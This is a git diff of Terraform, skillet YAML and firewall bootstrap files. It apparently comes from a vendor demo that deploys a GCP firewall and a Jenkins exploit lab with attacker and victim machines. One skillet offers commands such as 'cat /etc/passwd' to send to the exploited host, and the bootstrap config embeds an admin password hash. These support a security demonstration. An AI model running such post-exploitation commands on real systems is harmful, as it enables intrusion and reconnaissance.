\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/terraform.tfvars b/gcp/GP-NoAutoScaling/terraform.tfvars
new file mode 100644
index 00000000..780ca566
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/terraform.tfvars
@@ -0,0 +1,22 @@
+Billing_Account = "<Billing ID>"
+
+Base_Project_Name = "<Base Project Name>"
+
+Public_Key_Path = "~/.ssh/id_rsa.pub"
+
+GCP_Region = "<Region>"
+
+#FW_PanOS = "byol-904"              # Uncomment for PAN-OS 9.0.4 - BYOL
+FW_PanOS  = "bundle1-904"           # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 1
+#FW_PanOS = "bundle2-904"           # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 2
+
+FW_Image  = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries"
+
+
+Management_Subnet_CIDR = "10.0.0.0/24"
+
+Untrust_Subnet_CIDR = "10.0.1.0/24"
+
+Trust_Subnet_CIDR = "10.0.2.0/24"
+
+FW_Machine_Type = "n1-standard-4"
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/variables.tf b/gcp/GP-NoAutoScaling/variables.tf
new file mode 100644
index 00000000..fb7a8311
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/variables.tf
@@ -0,0 +1,10 @@
+variable Billing_Account {}
+variable Base_Project_Name {}
+variable Public_Key_Path {}
+variable GCP_Region {}
+variable Management_Subnet_CIDR {}
+variable Untrust_Subnet_CIDR {}
+variable Trust_Subnet_CIDR {}
+variable FW_Machine_Type {}
+variable FW_PanOS {}
+variable FW_Image {}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/vpc-subnets.tf b/gcp/GP-NoAutoScaling/vpc-subnets.tf
new file mode 100644
index 00000000..5373f55c
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/vpc-subnets.tf
@@ -0,0 +1,36 @@
+resource "google_compute_network" "management_network" {
+  project                 = google_project.globalprotect.number
+  name                    = "management"
+  auto_create_subnetworks = false
+}
+resource "google_compute_network" "untrust_network" {
+  project                 = google_project.globalprotect.number
+  name                    = "untrust"
+  auto_create_subnetworks = false
+}
+resource "google_compute_network" "trust_network" {
+  project                 = google_project.globalprotect.number
+  name                    = "trust"
+  auto_create_subnetworks = false
+}
+resource "google_compute_subnetwork" "management_subnet" {
+  name          = "management"
+  project       = google_project.globalprotect.number
+  region        = var.GCP_Region
+  ip_cidr_range = var.Management_Subnet_CIDR
+  network       = google_compute_network.management_network.self_link
+}
+resource "google_compute_subnetwork" "untrust_subnet" {
+  name          = "untrust"
+  project       = google_project.globalprotect.number
+  region        = var.GCP_Region
+  ip_cidr_range = var.Untrust_Subnet_CIDR
+  network       = google_compute_network.untrust_network.self_link
+}
+resource "google_compute_subnetwork" "trust_subnet" {
+  name          = "trust"
+  project       = google_project.globalprotect.number
+  region        = var.GCP_Region
+  ip_cidr_range = var.Trust_Subnet_CIDR
+  network       = google_compute_network.trust_network.self_link
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/webservers.tf b/gcp/GP-NoAutoScaling/webservers.tf
new file mode 100644
index 00000000..cbf1c424
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/webservers.tf
@@ -0,0 +1,75 @@
+resource "google_compute_instance" "server1" {
+  name         = "server1"
+  project      = google_project.globalprotect.number
+  zone         = data.google_compute_zones.available.names[0]
+  machine_type = "n1-standard-1"
+  allow_stopping_for_update = true
+  timeouts = {
+    create = "15m"
+    delete = "60m"
+  }
+
+  metadata = {
+    serial-port-enable      = true
+    ssh-keys                = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+  }
+
+  service_account {
+    scopes = [
+      "https://www.googleapis.com/auth/compute.readonly",
+      "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+      "https://www.googleapis.com/auth/devstorage.read_only",
+      "https://www.googleapis.com/auth/logging.write",
+      "https://www.googleapis.com/auth/monitoring.write",
+    ]
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "ubuntu-os-cloud/ubuntu-1804-lts"
+    }
+  }
+
+  network_interface {
+    subnetwork    = google_compute_subnetwork.trust_subnet.self_link
+    access_config {}
+  }
+}
+
+rresource "google_compute_instance" "server2" {
+  name         = "server2"
+  project      = google_project.globalprotect.number
+  zone         = data.google_compute_zones.available.names[1]
+  machine_type = "n1-standard-1"
+  allow_stopping_for_update = true
+  timeouts = {
+    create = "15m"
+    delete = "60m"
+  }
+
+  metadata = {
+    serial-port-enable      = true
+    ssh-keys                = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+  }
+
+  service_account {
+    scopes = [
+      "https://www.googleapis.com/auth/compute.readonly",
+      "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+      "https://www.googleapis.com/auth/devstorage.read_only",
+      "https://www.googleapis.com/auth/logging.write",
+      "https://www.googleapis.com/auth/monitoring.write",
+    ]
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "ubuntu-os-cloud/ubuntu-1804-lts"
+    }
+  }
+
+  network_interface {
+    subnetwork    = google_compute_subnetwork.trust_subnet.self_link
+    access_config {}
+  }
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml
new file mode 100644
index 00000000..ae3c0a1b
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml
@@ -0,0 +1,88 @@
+name: gcp_jenkins_exp
+# label used for menu selection
+label: GCP Jenkins Security Framework Step 1 Infrastructure Deployment Build
+
+description: >
+  This skillet deploys the Security Framework Azure Jenkins Exploit Protection environment.  The template deploy the Following:
+  GCP Projects, VPC's, Route Tables, Subnets, Availability Zones, Load Balancers and Native Security tools WAF and Network Security Groups.
+  The Template will also deploy Palo Alto Networks Firewall with security posture.
+# type of skillet (panos or panorama or template or terraform)
+type: python3
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+  collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+  - name: username
+    description: FW Username
+    default: admin
+    type_hint: text
+  - name: password
+    description: FW Password
+    default:
+    type_hint: password
+  - name: GCP_Region
+    description: GCP Region
+    default: us-central1
+    type_hint: dropdown
+    dd_list:                                                                                                      
+     - key: "US-Central-1 (Iowa)"                                                                                        
+       value: "us-central1"                                                                                       
+     - key: "US-East-1 (South Carolina)"                                                                                           
+       value: "us-east1"                                                                                          
+     - key: "US-East-4 (Virginia)"                                                                                           
+       value: "us-east4"                                                                                          
+     - key: "US-West-1 (Oregon)"                                                                                           
+       value: "us-west1"                                                                                          
+     - key: "US-West-2 (California)"                                                                                           
+       value: "us-west2"                                                                                          
+     - key: "Europe-North-1 (Finland)"                                                                                      
+       value: "europe-north1"                                                                                     
+     - key: "Europe-West-1 (Belgium)"                                                                                       
+       value: "europe-west1"                                                                                      
+     - key: "Europe-West-2 (UK)"                                                                                       
+       value: "europe-west2"                                                                                      
+     - key: "Europe-West-3 (Germany)"                                                                                       
+       value: "europe-west3"                                                                                      
+     - key: "Europe-West-4 (Netherlands)"                                                                                       
+       value: "europe-west4"                                                                                      
+     - key: "Europe-West-6 (Switzerland)"                                                                                       
+       value: "europe-west6"                                                                                      
+     - key: "North-America-Northeast-1 (Canada)"                                                                           
+       value: "northamerica-northeast1"                                                                           
+     - key: "South-America-East-1 (Brazil)"                                                                                
+       value: "southamerica-east1"                                                                                
+     - key: "Asia-East-1 (Taiwan)"                                                                                         
+       value: "asia-east1"                                                                                        
+     - key: "Asia-East-2 (Hong Kong)"                                                                                         
+       value: "asia-east2"                                                                                        
+     - key: "Asia-Northeast-1 (Tokyo)"                                                                                    
+       value: "asia-northeast1"                                                                                   
+     - key: "Asia-Northeast-2 (Osaka)"                                                                                    
+       value: "asia-northeast2"                                                                                   
+     - key: "Asia-South-1 (India)"                                                                                        
+       value: "asia-south1"                                                                                       
+     - key: "Asia-Southeast-1 (Singapore)"                                                                                    
+       value: "asia-southeast1"                                                                                   
+     - key: "Australia-Southeast-1 (Australia)"                                                                               
+       value: "australia-southeast1"
+  - name: Billing_Account
+    description: GCP Billing Account
+    default:
+    type_hint: text
+
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+  - name: script
+    file: ../../deploy.py
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml
new file mode 100644
index 00000000..dcd0ad24
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml
@@ -0,0 +1,41 @@
+name: gcp_jenkins_exp_teardown
+# label used for menu selection
+label: GCP Jenkins Security Framework Step 4 Teardown
+
+description: >
+  This skillet will destroy the GCP Jenkins Environment.  Run this step once the demo is complete.
+# type of skillet (panos or panorama or template or terraform)
+type: python3
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+  collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+  - name: username
+    description: FW Username
+    default: admin
+    type_hint: text
+  - name: password
+    description: FW Password
+    default:
+    type_hint: password
+
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+  - name: script
+    file: ../../destroy.py
+#    output_type:
+#    outputs:
+#      - name: app_threat_version
+#        capture_pattern: result/content-updates/entry/version
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml
new file mode 100644
index 00000000..539c9b30
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml
@@ -0,0 +1,41 @@
+name: gcp_jenkins_launch
+# label used for menu selection
+label: GCP Jenkins Security Framework Step 2 Launch exploit
+
+description: >
+  This Skillet will launch the Jenkins exploit.  You can choose to use the native tools or select PANOS enabled
+  Security to run the exploit of Jenkins Web application.
+  
+# type of skillet (panos or panorama or template or terraform)
+type: python3
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+  collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+  - name: vector
+    description: Attack Vector
+    default: native
+    type_hint: dropdown
+    dd_list:
+      - key: Native WAF
+        value: native
+      - key: PAN-OS
+        value: panos
+
+
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+  - name: payload
+    file: ../../launch_attack_vector.py
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml
new file mode 100644
index 00000000..9f46a8bb
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml
@@ -0,0 +1,32 @@
+name: GCP_login
+label: GCP Login (Pre-Deployment Step)
+
+description: |
+  This skillet will log into GCP. You will be prompted to follow a link and enter a device-code in your browser.
+# type of skillet (panos or panorama or template or terraform)
+type: template
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+  collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+#  - name: api_key
+#    description: API Key
+#    default: abc123
+#    type_hint: text
+
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+  - name: script
+    file: docker_cmd.j2
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2 b/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2
new file mode 100644
index 00000000..02637f31
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2
@@ -0,0 +1,25 @@
+To authenticate to GCP, please run the following command:
+
+Make sure you have a .config directory in you home directory
+On either OSX or Windows if the .config directory does not exist in your home directory:
+
+command from terminal or powershell in user home directory:
+mkdir .config
+
+
+Mac OSX- From a terminal window:
+docker run -ti --rm -v $HOME/.config:/root/.config google/cloud-sdk gcloud auth application-default login
+
+Windows- from a powershell:
+docker run -ti -p 8888:80 --rm -v /c/Users/%USERNAME%/.config:/root/.config google/cloud-sdk gcloud auth application-default login
+
+This command will display a link that you should copy into your browser. This will then display a verification
+code that you use to authenticate this machine.
+
+
+For more information, see the Google Cloud SDK guide here:
+
+https://cloud.google.com/sdk/gcloud/
+
+And for more information on authenticating, see here:
+https://cloud.google.com/sdk/gcloud/reference/auth/application-default/login
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml
new file mode 100644
index 00000000..5c843d7e
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml
@@ -0,0 +1,45 @@
+name: gcp_jenkins_send
+# label used for menu selection
+label: GCP Jenkins Security Framework Step 3 Send Command
+
+description: >
+  This Skillet will allow you to interact and send commands to the exploited Jenkins system.
+# type of skillet (panos or panorama or template or terraform)
+type: python3
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+  collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+  - name: cli
+    description: Command to Send
+    default: cat /etc/passwd
+    type_hint: dropdown
+    dd_list:
+      - key: "whoami & ps -ef--- Show who you are logged in as and running processes"
+        value: "whoami && ps -ef"
+      - key: "cat /etc/passwd--- show the contents of the passwd file"
+        value: "cat /etc/passwd"
+      - key: "netstat -a---- showing active tcp sessions"
+        value: "netstat -a"
+      - key: "netstat -tn 2>/dev/null |grep :443--- Show active tcp session on port 443"
+        value: "netstat -tn 2>/dev/null |grep :443"
+  - name: manual_cli
+    description: Manual Command to Send
+    default: ''
+    type_hint: text
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+  - name: payload
+    file: ../../send_command.py
diff --git a/gcp/Jenkins_proj-master/README.md b/gcp/Jenkins_proj-master/README.md
new file mode 100644
index 00000000..d76662b1
--- /dev/null
+++ b/gcp/Jenkins_proj-master/README.md
@@ -0,0 +1,2 @@
+Jenkins_proj
+Jenkins Project
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/attackers.tf b/gcp/Jenkins_proj-master/WebInDeploy/attackers.tf
new file mode 100644
index 00000000..d5efe764
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/attackers.tf
@@ -0,0 +1,42 @@
+resource "google_compute_instance" "attacker" {
+  name         = "attacker"
+  project      = "${google_project.attacker_project.id}"
+  zone         = "${var.GCP_Zone}"
+  machine_type = "n1-standard-1"
+  allow_stopping_for_update = true
+  timeouts = {
+    create = "15m"
+    delete = "60m"
+  }
+  depends_on = [
+                "google_storage_bucket_object.config_file_attacker",
+                "google_project_service.attacker_project"
+  ]
+  metadata {
+    startup-script-url      = "gs://${google_storage_bucket.attacker_bucket.name}/initialize_attacker.sh"
+    serial-port-enable  = true
+  }
+
+  service_account {
+    scopes = [
+      "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+      "https://www.googleapis.com/auth/devstorage.read_only",
+      "https://www.googleapis.com/auth/logging.write",
+      "https://www.googleapis.com/auth/monitoring.write",
+      "https://www.googleapis.com/auth/compute.readonly",
+    ]
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "ubuntu-os-cloud/ubuntu-1604-lts"
+    }
+  }
+
+  network_interface {
+    subnetwork    = "${google_compute_subnetwork.attacker_subnet.self_link}"
+    network_ip    = "${var.Attacker_IP}"
+    access_config = {}
+  }
+  depends_on = ["google_storage_bucket_object.config_file_attacker"]
+}
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap.tf b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap.tf
new file mode 100644
index 00000000..5221c2dc
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap.tf
@@ -0,0 +1,47 @@
+resource "google_storage_bucket" "bootstrap_bucket" {
+  name            = "${var.Victim_Project_Name}-${random_id.project_number.hex}"
+  storage_class   = "REGIONAL"
+  location        = "${var.GCP_Region}"
+  project         = "${google_project.victim_project.id}"
+} 
+resource "google_storage_bucket" "attacker_bucket" {
+  name            = "${var.Attacker_Project_Name}-${random_id.project_number.hex}"
+  storage_class   = "REGIONAL"
+  location        = "${var.GCP_Region}"
+  project         = "${google_project.attacker_project.id}"
+} 
+resource "google_storage_bucket_object" "config_file_webserver" {
+  name   = "initialize_webserver.sh"
+  source = "scripts/initialize_webserver.sh"
+  bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
+resource "google_storage_bucket_object" "config_file_attacker" {
+  name   = "initialize_attacker.sh"
+  source = "scripts/initialize_attacker.sh"
+  bucket = "${google_storage_bucket.attacker_bucket.name}"
+}
+resource "google_storage_bucket_object" "bootstrap" {
+  name   = "config/bootstrap.xml"
+  source = "bootstrap/bootstrap.xml"
+  bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
+resource "google_storage_bucket_object" "init_cfg" {
+  name   = "config/init-cfg.txt"
+  source = "bootstrap/init-cfg.txt"
+  bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
+resource "google_storage_bucket_object" "content" {
+  name   = "content/null.txt"
+  source = "bootstrap/null.txt"
+  bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
+resource "google_storage_bucket_object" "software" {
+  name   = "software/null.txt"
+  source = "bootstrap/null.txt"
+  bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
+resource "google_storage_bucket_object" "license" {
+  name   = "license/null.txt"
+  source = "bootstrap/null.txt"
+  bucket = "${google_storage_bucket.bootstrap_bucket.name}"
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml
new file mode 100644
index 00000000..83b66601
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml
@@ -0,0 +1,2656 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="8.1.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$fhfqjgjl$UKU4H9KWTwmKrxropu9BK.</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg==</public-key>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <log-settings>
+      <email>
+        <entry name="Sample_Email_Profile">
+          <server>
+            <entry name="Sample_Email_Profile">
+              <display-name>Panorama</display-name>
+              <gateway>1.2.3.4</gateway>
+              <from>test@yourdomain.com</from>
+              <to>test@yourdomain.com</to>
+            </entry>
+          </server>
+        </entry>
+      </email>
+      <syslog>
+        <entry name="Sample_Syslog_Profile">
+          <server>
+            <entry name="Sample_Syslog">
+              <transport>UDP</transport>
+              <port>514</port>
+              <format>BSD</format>
+              <server>1.2.3.4</server>
+              <facility>LOG_USER</facility>
+            </entry>
+          </server>
+        </entry>
+      </syslog>
+      <system>
+        <match-list>
+          <entry name="Email_Critical_System_Logs">
+            <send-email>
+              <member>Sample_Email_Profile</member>
+            </send-email>
+            <filter>(severity eq critical)</filter>
+            <description>Email Critical System Logs</description>
+          </entry>
+          <entry name="System_Log_Forwarding">
+            <filter>All Logs</filter>
+            <send-to-panorama>no</send-to-panorama>
+            <send-syslog>
+              <member>Sample_Syslog_Profile</member>
+            </send-syslog>
+          </entry>
+        </match-list>
+      </system>
+      <config>
+        <match-list>
+          <entry name="Configuration_Log_Forwarding">
+            <filter>All Logs</filter>
+            <send-to-panorama>no</send-to-panorama>
+            <send-syslog>
+              <member>Sample_Syslog_Profile</member>
+            </send-syslog>
+          </entry>
+        </match-list>
+      </config>
+      <userid>
+        <match-list>
+          <entry name="User-ID_Log_Forwarding">
+            <filter>All Logs</filter>
+            <send-to-panorama>no</send-to-panorama>
+            <send-syslog>
+              <member>Sample_Syslog_Profile</member>
+            </send-syslog>
+          </entry>
+        </match-list>
+      </userid>
+      <hipmatch>
+        <match-list>
+          <entry name="HIP_Log_Forwarding">
+            <filter>All Logs</filter>
+            <send-to-panorama>no</send-to-panorama>
+            <send-syslog>
+              <member>Sample_Syslog_Profile</member>
+            </send-syslog>
+          </entry>
+        </match-list>
+      </hipmatch>
+      <profiles>
+        <entry name="default">
+          <match-list>
+            <entry name="Traffic_Log_Forwarding">
+              <log-type>traffic</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+            <entry name="Threat_Log_Forwarding">
+              <log-type>threat</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+            <entry name="Email_Malicious_Verdicts">
+              <send-email>
+                <member>Sample_Email_Profile</member>
+              </send-email>
+              <action-desc>Email Malicious Wildfire Verdicts</action-desc>
+              <log-type>wildfire</log-type>
+              <filter>(verdict eq malicious)</filter>
+              <send-to-panorama>no</send-to-panorama>
+            </entry>
+            <entry name="Email_Phishing_Verdicts">
+              <send-email>
+                <member>Sample_Email_Profile</member>
+              </send-email>
+              <action-desc>Email Phishing Wildfire Verdicts</action-desc>
+              <log-type>wildfire</log-type>
+              <filter>(verdict eq phishing)</filter>
+              <send-to-panorama>no</send-to-panorama>
+            </entry>
+            <entry name="Wildfire_Log_Forwarding">
+              <log-type>wildfire</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+            <entry name="URL_Log_Forwarding">
+              <log-type>url</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+            <entry name="Data_Log_Forwarding">
+              <log-type>data</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+            <entry name="GTP_Log_Forwarding">
+              <log-type>gtp</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+            <entry name="Tunnel_Log_Forwarding">
+              <log-type>tunnel</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+            <entry name="Auth_Log_Forwarding">
+              <log-type>auth</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>no</send-to-panorama>
+              <send-syslog>
+                <member>Sample_Syslog_Profile</member>
+              </send-syslog>
+            </entry>
+          </match-list>
+        </entry>
+      </profiles>
+    </log-settings>
+    <reports>
+      <entry name="Host-visit malicious sites plus">
+        <period>last-7-calendar-days</period>
+        <topn>500</topn>
+        <topm>50</topm>
+        <caption>Host-visit malicious sites plus</caption>
+        <frequency>daily</frequency>
+        <query>(category eq command-and-control) or (category eq hacking) or (category eq malware) or (category eq phishing)</query>
+        <type>
+          <url>
+            <sortby>repeatcnt</sortby>
+            <group-by>src</group-by>
+            <aggregate-by>
+              <member>from</member>
+              <member>srcuser</member>
+              <member>category</member>
+              <member>action</member>
+            </aggregate-by>
+            <values>
+              <member>repeatcnt</member>
+            </values>
+          </url>
+        </type>
+      </entry>
+      <entry name="Hosts visit malicious sites">
+        <period>last-7-calendar-days</period>
+        <topn>500</topn>
+        <topm>50</topm>
+        <caption>Hosts visit malicious sites</caption>
+        <frequency>daily</frequency>
+        <query>(category eq command-and-control) or (category eq hacking) or (category eq malware) or (category eq phishing)</query>
+        <type>
+          <url>
+            <sortby>repeatcnt</sortby>
+            <group-by>src</group-by>
+            <aggregate-by>
+              <member>from</member>
+              <member>srcuser</member>
+            </aggregate-by>
+            <values>
+              <member>repeatcnt</member>
+            </values>
+          </url>
+        </type>
+      </entry>
+      <entry name="Hosts visit questionable sites">
+        <period>last-7-calendar-days</period>
+        <topn>500</topn>
+        <topm>50</topm>
+        <caption>Hosts visit questionable sites</caption>
+        <frequency>daily</frequency>
+        <query>(category eq dynamic-dns) and (category eq parked) and (category eq questionable) and (category eq unknown)</query>
+        <type>
+          <url>
+            <sortby>repeatcnt</sortby>
+            <group-by>src</group-by>
+            <aggregate-by>
+              <member>from</member>
+              <member>srcuser</member>
+            </aggregate-by>
+            <values>
+              <member>repeatcnt</member>
+            </values>
+          </url>
+        </type>
+      </entry>
+      <entry name="Host-visit quest sites plus">
+        <period>last-7-calendar-days</period>
+        <topn>500</topn>
